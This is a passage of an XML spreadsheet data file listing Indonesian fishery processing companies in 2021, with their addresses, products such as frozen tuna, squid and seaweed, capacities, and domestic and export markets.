    <d v="2021-02-25T00:00:00"/>
    <n v="600"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23997"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="0"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Jambi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Brunei Darussalam, Japan, Malaysia"/>
  </r>
  <r>
    <n v="23998"/>
    <x v="961"/>
    <s v="PT. BERJAYA USAHA SAKTI"/>
    <s v="Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Mata Besar, Gulama, Kambing-kambing, Pisang-pisang, Layur, Bawal)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23999"/>
    <x v="961"/>
    <s v="PT. BERJAYA USAHA SAKTI"/>
    <s v="Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuring, Aso-aso, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Pekanbaru, Kota Jakarta Utara"/>
    <s v="China, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="24000"/>
    <x v="961"/>
    <s v="PT. BERJAYA USAHA SAKTI"/>
    <s v="Jl. Gabion No.16 LK XI, Kel. Bagan Deli, Kec. Medan Belawan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24001"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Swanggi, Gulama, Lencam, Kerapu, Layur, Kakatua, Bawal, Kakap, Kuro)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24002"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24003"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24004"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Asin Kering"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="360000"/>
    <s v="Kota Probolinggo, Kota Pasuruan, Kota Surabaya"/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24005"/>
    <x v="308"/>
    <s v="CV, PESONA MANDIRI"/>
    <s v="Jl, Ikan Belanak No,01, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kerang Beku"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="360000"/>
    <s v="Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya"/>
    <s v="China, Malaysia, Viet Nam"/>
  </r>
  <r>
    <n v="24006"/>
    <x v="962"/>
    <s v="PT. YFIN INTERNATIONAL"/>
    <s v="Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24007"/>
    <x v="962"/>
    <s v="PT. YFIN INTERNATIONAL"/>
    <s v="Pergudangan Sentra Kosambi Blok G-1/F, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Bandeng Beku"/>
    <d v="2021-04-01T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="24008"/>
    <x v="963"/>
    <s v="NASA BOGA"/>
    <s v="Jl. Ceremai Ujung No.15 RT 002 RW 002, Kel. Bantarjati, Kec. Bogor Utara, Kota Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso, Naget, Siomay, Tahu Bakso, Dimsum) "/>
    <d v="2021-03-10T00:00:00"/>
    <n v="2880"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bogor, Kota Bogor, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="24014"/>
    <x v="963"/>
    <s v="NASA BOGA"/>
    <s v="Jl. Ceremai Ujung No.15 RT 002 RW 002, Kel. Bantarjati, Kec. Bogor Utara, Kota Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Pempek Ikan"/>
    <d v="2021-03-10T00:00:00"/>
    <n v="120"/>
    <s v="Kota Bogor"/>
    <m/>
  </r>
  <r>
    <n v="24015"/>
    <x v="964"/>
    <s v="CV. FARIS INDO SEAFOOD"/>
    <s v="Pattene Business Park Blok K No.2, Kel. Pattene, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="China, Japan, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="24016"/>
    <x v="964"/>
    <s v="CV. FARIS INDO SEAFOOD"/>
    <s v="Pattene Business Park Blok K No.2, Kel. Pattene, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-02-10T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Japan, Malaysia, Saudi Arabia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="24017"/>
    <x v="756"/>
    <s v="PT. SEAFERMART JAYA RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Salem, Saba Mackerel)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="99986"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24018"/>
    <x v="756"/>
    <s v="PT. SEAFERMART JAYA RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24019"/>
    <x v="756"/>
    <s v="PT. SEAFERMART JAYA RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bulu Babi Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24020"/>
    <x v="756"/>
    <s v="PT. SEAFERMART JAYA RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24021"/>
    <x v="756"/>
    <s v="PT. SEAFERMART JAYA RAYA"/>
    <s v="Jl. Cumi Raya No.3 Muara Baru, Room 302 dan 602, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="24022"/>
    <x v="965"/>
    <s v="KOPERASI SERBA USAHA NELAYAN BINTAN"/>
    <s v="Kp. Kolam, Jl. Sei Enam GG Tarantua, Kel. Sei Enam, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Segar (Anggoli, Kerapu, Kakap, Kaci-kaci, Malong)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="2500"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24023"/>
    <x v="965"/>
    <s v="KOPERASI SERBA USAHA NELAYAN BINTAN"/>
    <s v="Kp. Kolam, Jl. Sei Enam GG Tarantua, Kel. Sei Enam, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Mata Besar, Tongkol, Selar, Tenggiri)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="3000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24024"/>
    <x v="965"/>
    <s v="KOPERASI SERBA USAHA NELAYAN BINTAN"/>
    <s v="Kp. Kolam, Jl. Sei Enam GG Tarantua, Kel. Sei Enam, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="2000"/>
    <s v="Kota Batam"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="24025"/>
    <x v="966"/>
    <s v="PT. INDOMINA CIPTA AGUNG"/>
    <s v="Jl. Tugu Wijaya III No.2 Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga, Otak-Otak Ikan)"/>
    <d v="2021-03-05T00:00:00"/>
    <n v="7200000"/>
    <s v="Kota Palembang, Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Cirebon, Kabupaten Banyumas, Kabupaten Kudus, Kabupaten Demak, Kota Surakarta, Kota Semarang, Kota Pekalongan, Kota Tegal, Kota Yogyakarta, Kabupaten Gresik, Kota Surabaya, Kota Denpasar, Kota Mataram"/>
    <m/>
  </r>
  <r>
    <n v="24027"/>
    <x v="954"/>
    <s v="PT. AWINDO"/>
    <s v="Jl. Area Galangan Kapal, Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Gindara, Tenggiri, Todak, Cakalang)"/>
    <d v="2021-03-19T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="24029"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Jakarta Utara, Kota Surakarta"/>
    <s v="China, Japan, Thailand"/>
  </r>
  <r>
    <n v="24030"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Italy, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24031"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Bawal, Kerapu, Kakap, Kurisi, Ekor Kuning, Layur)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="China, France, Japan, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24032"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang - Tuban Km 138, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Makerel, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-03-31T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="24035"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Segar (Bream, Kerapu, Layur, Kakatua, Bawal, Kakap, Terisi, Barramundi)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24036"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Kakatua, Bawal, Kakap, Terisi, Cunang, Barramundi)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24037"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Segar (Bonito, Marlin, Selayang, Layaran, Layang, Tenggiri, Selayar)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24038"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Pelagis Beku (Bonito, Marlin, Selayang, Layang, Tenggiri, Selayar)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24039"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="7500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24040"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="7500"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24041"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Segar"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24042"/>
    <x v="967"/>
    <s v="PT. LAUTAN PURNAMA INTERNUSA"/>
    <s v="Jl. Pantai RT 02 RW 01, Kel. Babang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="9000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Australia"/>
  </r>
  <r>
    <n v="24043"/>
    <x v="968"/>
    <s v="DAPUR Q"/>
    <s v="Dusun Palam RT 002 RW 002, Kel. Sawah Baru, Kec. Kampa, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Sarden Pouch"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="120"/>
    <s v="Kabupaten Kampar, Kota Pekanbaru"/>
    <m/>
  </r>
  <r>
    <n v="24044"/>
    <x v="969"/>
    <s v="MINA SEJAHTERA"/>
    <s v="Jl. Peltu Syaidan Kp. Deling, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Mie Ikan)"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Kampar"/>
    <m/>
  </r>
  <r>
    <n v="24045"/>
    <x v="970"/>
    <s v="AHMADI EMPAT SEHAT"/>
    <s v="Dusun Kampung Godang RT 001 RW 002, Kel. Desa Pulau Lawas, Kec. Bangkinang, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Otak-Otak Ikan"/>
    <d v="2021-01-28T00:00:00"/>
    <n v="60"/>
    <s v="Kabupaten Kampar"/>
    <m/>
  </r>
  <r>
    <n v="24046"/>
    <x v="971"/>
    <s v="PT. KAYA SAMUDRA GLOBAL"/>
    <s v="Jl. Pergudangan Tambak Langon Indah No.27 Blok B-19, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="7200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="24047"/>
    <x v="972"/>
    <s v="PT. ASIA SEJAHTERA MINA Tbk"/>
    <s v="Pergudangan Tiara Jabon Blok B7, Jl. Tambak Sawah, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-03-29T00:00:00"/>
    <n v="4000000"/>
    <s v="Kabupaten Situbondo"/>
    <s v="Chile, China, Philippines, Spain, Viet Nam"/>
  </r>
  <r>
    <n v="24048"/>
    <x v="973"/>
    <s v="PUTRI BAHARI"/>
    <s v="Korong Simpang, Kel. Kataping, Kec. Batang Anai, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Mini Bag Ikan) "/>
    <d v="2021-02-11T00:00:00"/>
    <n v="1080"/>
    <s v="Kabupaten Padang Pariaman, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="24049"/>
    <x v="973"/>
    <s v="PUTRI BAHARI"/>
    <s v="Korong Simpang, Kel. Kataping, Kec. Batang Anai, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Stik Ikan"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="1800"/>
    <s v="Kabupaten Padang Pariaman, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="24050"/>
    <x v="973"/>
    <s v="PUTRI BAHARI"/>
    <s v="Korong Simpang, Kel. Kataping, Kec. Batang Anai, Kabupaten Padang Pariaman&lt;br&gt;Sumatera Barat"/>
    <n v="3"/>
    <s v="Kembang Loyang Ikan"/>
    <d v="2021-02-11T00:00:00"/>
    <n v="600"/>
    <s v="Kabupaten Padang Pariaman, Kota Pariaman"/>
    <m/>
  </r>
  <r>
    <n v="24051"/>
    <x v="974"/>
    <s v="GRAHA PRATAMA FISH"/>
    <s v="Jl. Syech Ja'far 07, Desa Koto Mesjid, Kec. XIII Koto Kampar, Kabupaten Kampar&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Fillet Patin Beku"/>
    <d v="2021-01-29T00:00:00"/>
    <n v="18000"/>
    <s v="Kabupaten Kampar, Kota Pekanbaru"/>
    <m/>
  </r>
  <r>
    <n v="24052"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24053"/>
    <x v="976"/>
    <s v="CV. MAMORA"/>
    <s v="Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Salmon Beku"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="24054"/>
    <x v="976"/>
    <s v="CV. MAMORA"/>
    <s v="Jl. Srikuncoro III No.118, Kel. Kalibanteng Kulon, Kec. Semarang Barat, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-03-25T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="24055"/>
    <x v="944"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kerapu, Layur, Kakap)"/>
    <d v="2021-02-02T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Australia, China, Hong Kong, Japan, Singapore, Taiwan, Province of China, Thailand, United States"/>
  </r>
  <r>
    <n v="24056"/>
    <x v="161"/>
    <s v="CV. DUTA RATU PERTIWI LANCAR"/>
    <s v="Komplek PPNP, Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Gulama, Kuniran, Layur, Kaca Piring, Kapas-kapas)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="480000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="24057"/>
    <x v="161"/>
    <s v="CV. DUTA RATU PERTIWI LANCAR"/>
    <s v="Komplek PPNP, Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="24058"/>
    <x v="161"/>
    <s v="CV. DUTA RATU PERTIWI LANCAR"/>
    <s v="Komplek PPNP, Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2021-04-23T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="24060"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakatua, Bawal, Kakap)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24061"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Hidup (Kerapu, Kakatua, Bawal, Kakap)"/>
    <d v="2021-03-12T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="24062"/>
    <x v="975"/>
    <s v="PT. MANADO MAJU SARANA LOGISTIK"/>
    <s v="Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
